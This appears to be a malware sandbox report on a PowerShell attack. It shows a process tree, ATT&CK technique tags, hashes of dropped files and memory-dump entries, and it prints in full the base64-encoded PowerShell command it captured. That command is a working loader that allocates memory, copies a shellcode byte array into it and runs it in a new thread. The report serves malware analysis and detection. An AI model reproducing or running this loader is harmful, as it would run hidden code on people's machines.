AHMAaABlAGwAbAAgACQAMgBoAGIAIAAkAGUAIgA7AH0A
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2520
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JAB0ADQAQQBXACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAdAA0AEEAVwAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABkAGIALAAwAHgAYwA5ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeABiAGYALAAwAHgAOAA1ACwAMAB4ADgAOQAsADAAeABlADIALAAwAHgAYgA0ACwAMAB4ADUAYQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA0AGIALAAwAHgAMwAxACwAMAB4ADcAYQAsADAAeAAxADcALAAwAHgAMAAzACwAMAB4ADcAYQAsADAAeAAxADcALAAwAHgAOAAzACwAMAB4ADQANwAsADAAeAA4AGQALAAwAHgAMAAwACwAMAB4ADQAMQAsADAAeABiAGIALAAwAHgANgA2ACwAMAB4ADQAYgAsADAAeABhAGEALAAwAHgANAAzACwAMAB4ADcANwAsADAAeAAzADQALAAwAHgAOQBhACwAMAB4ADkAMQAsADAAeABmAGUALAAwAHgANQAxACwAMAB4AGIAOAAsADAAeAA5AGUALAAwAHgANQAzACwAMAB4AGEAYQAsADAAeABjAGEALAAwAHgAZgAyACwAMAB4ADUAZgAsADAAeAA0ADEALAAwAHgAOQBlACwAMAB4AGUANgAsADAAeABkADQALAAwAHgAMgA3ACwAMAB4ADMANwAsADAAeAAwADkALAAwAHgANQBjACwAMAB4ADgAZAAsADAAeAA2ADEALAAwAHgAMgA0ACwAMAB4ADUAZAAsADAAeAAyADMALAAwAHgAYQBlACwAMAB4AGUAYQAsADAAeAA5AGQALAAwAHgAMgA1ACwAMAB4ADUAMgAsADAAeABmADAALAAwAHgAZgAxACwAMAB4ADgANQAsADAAeAA2AGIALAAwAHgAMwBiACwAMAB4ADAANAAsADAAeABjADcALAAwAHgAYQBjACwAMAB4ADgAYQAsADAAeAA2ADIALAAwAHgAMgA4ACwAMAB4ADYAMAAsADAAeAA4ADcALAAwAHgAZABmACwAMAB4AGEANgAsADAAeABkADIALAAwAHgAMQBjACwAMAB4ADkAZAAsADAAeABmAGEALAAwAHgAZABkACwAMAB4AGYAMgAsADAAeABhADkALAAwAHgANAAzACwAMAB4AGEANgAsADAAeAA3ADcALAAwAHgANgBkACwAMAB4ADMANwAsADAAeAAxAGEALAAwAHgANwA2ACwAMAB4AGIAZQAsADAAeAAzADMALAAwAHgAZQBhACwAMAB4ADYAMAAsADAAeAA2AGUALAAwAHgAYwBmACwAMAB4AGIAMwAsADAAeABiADAALAAwAHgAOABmACwAMAB4ADEAYwAsADAAeABjADYALAAwAHgANwA5ACwAMAB4AGYAYgAsADAAeAA5AGUALAAwAHgAZgA4ACwAMAB4ADgANgAsADAAeAA0AGQALAAwAHgANQA0ACwAMAB4AGMAZQAsADAAeABmADMALAAwAHgANABmACwAMAB4AGIAYwAsADAAeAAxAGUALAAwAHgAYwAzACwAMAB4AGYAYwAsADAAeAA4ADEALAAwAHgAYQBlACwAMAB4AGMAZQAsADAAeABmAGQALAAwAHgAYwA2ACwAMAB4ADAAOQAsADAAeAAzADAALAAwAHgAOAA4ACwAMAB4ADMAYwAsADAAeAA2AGEALAAwAHgAYwBkACwAMAB4ADgAYgAsADAAeAA4ADYALAAwAHgAMQAwACwAMAB4ADAAOQAsADAAeAAxADkALAAwAHgAMQA5ACwAMAB4AGIAMgAsADAAeABkAGEALAAwAHgAYgA5ACwAMAB4AGYAZAAsADAAeAA0ADIALAAwAHgAMABmACwAMAB4ADUAZgAsADAAeAA3ADUALAAwAHgANAA4ACwAMAB4AGUANAAsADAAeAAyAGIALAAwAHgAZAAxACwAMAB4ADQAZAAsADAAeABmAGIALAAwAHgAZgA4ACwAMAB4ADYAOQAsADAAeAA2ADkALAAwAHgANwAwACwAMAB4AGYAZgAsADAAeABiAGQALAAwAHgAZgBiACwAMAB4AGMAMgAsADAAeAAyADQALAAwAHgAMQBhACwAMAB4AGEANwAsADAAeAA5ADEALAAwAHgANAA1ACwAMAB4ADMAYgAsADAAeAAwAGQALAAwAHgANwA0ACwAMAB4ADcAOQAsADAAeAA1AGIALAAwAHgAZQA5ACwAMAB4ADIAOQAsADAAeABkAGYALAAwAHgAMQA3ACwAMAB4ADEAOAAsADAAeAAzAGMALAAwAHgANQBmACwAMAB4AGQAOAAsADAAeABlADIALAAwAHgANAAxACwAMAB4ADMAZAAsADAAeAA0AGYALAAwAHgAMgBlACwAMAB4ADgAZgAsADAAeABiAGUALAAwAHgAOABmACwAMAB4ADMAOAAsADAAeAA5ADgALAAwAHgAYwBkACwAMAB4AGIAZAAsADAAeABlADcALAAwAHgAMwAyACwAMAB4ADUAYQAsADAAeAA4AGUALAAwAHgANgAwACwAMAB4ADkAYwAsADAAeAA5AGQALAAwAHgAOAA3ACwAMAB4ADYANwAsADAAeAAxAGYALAAwAHgANwAxACwAMAB4ADIAZgAsADAAeABlADcALAAwAHgAZABlACwAMAB4ADcAMgAsADAAeAA1ADAALAAwAHgAMgAxACwAMAB4ADIANAAsADAAeAAyADYALAAwAHgAMAAwACwAMAB4ADUAOQAsADAAeAA4AGQALAAwAHgANAA3ACwAMAB4AGMAYgAsADAAeAA5ADkALAAwAHgAMwAyACwAMAB4ADkAMgAsADAAeAA2ADYALAAwAHgAOQAwACwAMAB4AGEANAAsADAAeAAxADcALAAwAHgANwA3ACwAMAB4AGEANgAsADAAeAAzAGIALAAwAHgANAAwACwAMAB4ADcANQAsADAAeABhADYALAAwAHgANABiACwAMAB4ADMAZQAsADAAeABmADAALAAwAHgANAAwACwAMAB4ADEAYgAsADAAeAA2AGUALAAwAHgANQAzACwAMAB4AGQAZAAsADAAeABkAGIALAAwAHgAZABlACwAMAB4ADEAMwAsADAAeAA4AGQALAAwAHgAYgAzACwAMAB4ADMANAAsADAAeAA5AGMALAAwAHgAZgAyACwAMAB4AGEAMwAsADAAeAAzADYALAAwAHgANwA2ACwAMAB4ADkAYgAsADAAeAA0ADkALAAwAHgAZAA5ACwAMAB4ADIAZgAsADAAeABmADMALAAwAHgAZQA1ACwAMAB4ADQAMAAsADAAeAA2AGEALAAwAHgAOABmACwAMAB4ADkANAAsADAAeAA4AGQALAAwAHgAYQAwACwAMAB4AGYANQAsADAAeAA5ADYALAAwAHgAMAA2ACwAMAB4ADQANwAsADAAeAAwADkALAAwAHgANQA4ACwAMAB4AGUAZgAsADAAeAAyADIALAAwAHgAMQA5ACwAMAB4ADAAYwAsADAAeAAxAGYALAAwAHgANwA5ACwAMAB4ADQAMwAsADAAeAA5AGEALAAwAHgAMgAwACwAMAB4ADUANwAsADAAeABlAGUALAAwAHgAMgAyACwAMAB4AGIANQAsADAAeAA1AGMALAAwAHgAYgA5ACwAMAB4ADcANQAsADAAeAAyADEALAAwAHgANQBmACwAMAB4ADkAYwAsADAAeABiADEALAAwAHgAZQBlACwAMAB4AGEAMAAsADAAeABjAGIALAAwAHgAYwBhACwAMAB4ADIANwAsADAAeAAzADUALAAwAHgAYgA0ACwAMAB4AGEANAAsADAAeAA0ADcALAAwAHgAZAA5ACwAMAB4ADMANAAsADAAeAAzADQALAAwAHgAMQBlACwAMAB4AGIAMwAsADAAeAAzADQALAAwAHgANQBjACwAMAB4AGMANgAsADAAeABlADcALAAwAHgANgA2ACwAMAB4ADcAOQAsADAAeAAwADkALAAwAHgAMwAyACwAMAB4ADEAYgAsADAAeABkADIALAAwAHgAOQBjACwAMAB4AGIAZAAsADAAeAA0AGEALAAwAHgAOAA3ACwAMAB4ADMANwAsADAAeABkADYALAAwAHgANwAwACwAMAB4AGYAZQAsADAAeAA3ADAALAAwAHgANwA5ACwAMAB4ADgAYQAsADAAeABkADUALAAwAHgAOAAwACwAMAB4ADQANQAsADAAeAA1AGQALAAwAHgAMQAzACwAMAB4AGYANwAsADAAeABhADcALAAwAHgANQBkADsAJABnACAAPQAgADAAeAAxADAAMAAwADsAaQBmACAAKAAkAHoALgBMAGUAbgBnAHQAaAAgAC0AZwB0ACAAMAB4ADEAMAAwADAAKQB7ACQAZwAgAD0AIAAkAHoALgBMAGUAbgBnAHQAaAB9ADsAJABlAFUAMwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAZQBVADMALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAGUAVQAzACwAMAAsADAALAAwACkAOwBmAG8AcgAgACgAOwA7ACkAewBTAHQAYQByAHQALQBzAGwAZQBlAHAAIAA2ADAAfQA7AA==
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2320
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5jxz0e0g.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2876
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB887.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCB886.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2724

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5jxz0e0g.dll

Filesize
3KB

MD5
d54be8d9fdae11fb7d0ad3e559d36127

SHA1
62ee65795d38e31d396e857ab07ba84d0cb5413e

SHA256
4ba1d7f99607bfde5bdf1c4ee39c96c61735e8a06101e8551fc0af04627327b2

SHA512
7e84b98117923985e575cef142fc9f1d0e627a499558e5fcc030d3609cad280a673bf3242b9364abee3b55c1218ff8fd7f552f6b61097f7ecbfbc73dd0f093a8

Download Submit
C:\Users\Admin\AppData\Local\Temp\5jxz0e0g.pdb

Filesize
7KB

MD5
cd55149dd4ecdbbf99f72cba0f35ffac

SHA1
d7b37a5c4691af155cf42bcd3288c74e27fa2bb1

SHA256
9ee095d858e8825dcdfd6b28c59a23700eb422c6be2efc2bace9224e97dd8952

SHA512
3caa540a9ec13a88eb63d141388582091fa33b44eab44db6463a9e2a1a9937a95e1ad850b243e01c6cc09d29a6f98688e3a4cd56ce761f8f517cfea5801d2cbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB887.tmp

Filesize
1KB

MD5
4aa8af5d1b15120653f8014f0b35f1be

SHA1
81d817ba55fa75030040f8f7b607254fd2999cfe

SHA256
5d0abec37a8408ed65b6aa0934cb70941d4734b377560b2a13a7c025c0301d07

SHA512
076d6f143f90e03c30cc0c598b11f7c454ef8f4d6416db614f24ed7ffd3ef5eef8be7570aa2702630a8a1e43bc65aad03a9d182c63128f5b9fffe4a52894b8a6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\M5W2PCX8FE2WU2PJEP6D.temp

Filesize
7KB

MD5
636b5e377a8ae4023b0df70805288caf

SHA1
8f5bb0e3a6dddf18de3812e81d2323b87172fe4c

SHA256
118e083b30cfb313f309d13d72725d833e9b7dd4f4722fc44d92e8bf22ddbcc2

SHA512
841f09792cc99ca1632647d8a1b67fb070c01ef230887ce56e59f7a99f14db94cf5bb588eb2b7290e388b7aeeb9c05fc51ea7ebe1100f3613c17f355125582d2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5jxz0e0g.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\5jxz0e0g.cmdline

Filesize
309B

MD5
5e982b105bb6e16348bd9540a24794fd

SHA1
b699ce6ea411f8256d1e56c5c6bcc9b75223da1d

SHA256
a5cf27c284475a0ce744f300becc1543e0bf85d3a7b02394ef13700ba6310762

SHA512
8c44f0440d9c84e7d2b4e7e44f3965d2ff1c6987d19b90c34e910e522861e568f53f4581a31f0fc5667bc98a73704e9ae417747eb7f2cff26a0211a529a1aa71

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCB886.tmp

Filesize
652B

MD5
bf2644873ca089b11d64aa20017836cc

SHA1
b5108a5a7a017bf6c22e453d1192c77aec56479f

SHA256
0926398ca90d78783ee66d8a5ef30d609b1c57b174a372731955953b945761b6

SHA512
19420054fc0761202247a56aa6c373e9f8b2e621b165484850d0764450fb42039753e1d1305c2577cb38e9c3bd047912882f0e022f93e4b2195fe63c344ca65e

Download Submit
memory/1928-1-0x0000000000D20000-0x0000000000D2A000-memory.dmp

Filesize
40KB

Download
memory/1928-32-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp

Filesize
4KB

Download
memory/1928-0-0x000007FEF5EA3000-0x000007FEF5EA4000-memory.dmp

Filesize
4KB

Download
memory/2320-31-0x0000000002A00000-0x0000000002A01000-memory.dmp

Filesize
4KB

Download
memory/2520-12-0x000007FEF3E40000-0x000007FEF47DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-8-0x000007FEF3E40000-0x000007FEF47DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-7-0x000000001B680000-0x000000001B962000-memory.dmp

Filesize
2.9MB

Download
memory/2520-9-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

Filesize
32KB

Download
memory/2520-6-0x000007FEF40FE000-0x000007FEF40FF000-memory.dmp

Filesize
4KB

Download
memory/2520-10-0x000007FEF3E40000-0x000007FEF47DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-11-0x000007FEF3E40000-0x000007FEF47DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-13-0x000007FEF3E40000-0x000007FEF47DD000-memory.dmp

Filesize
9.6MB

Download
memory/2520-33-0x000007FEF40FE000-0x000007FEF40FF000-memory.dmp

Filesize
4KB

Download
memory/2520-34-0x000007FEF3E40000-0x000007FEF47DD000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads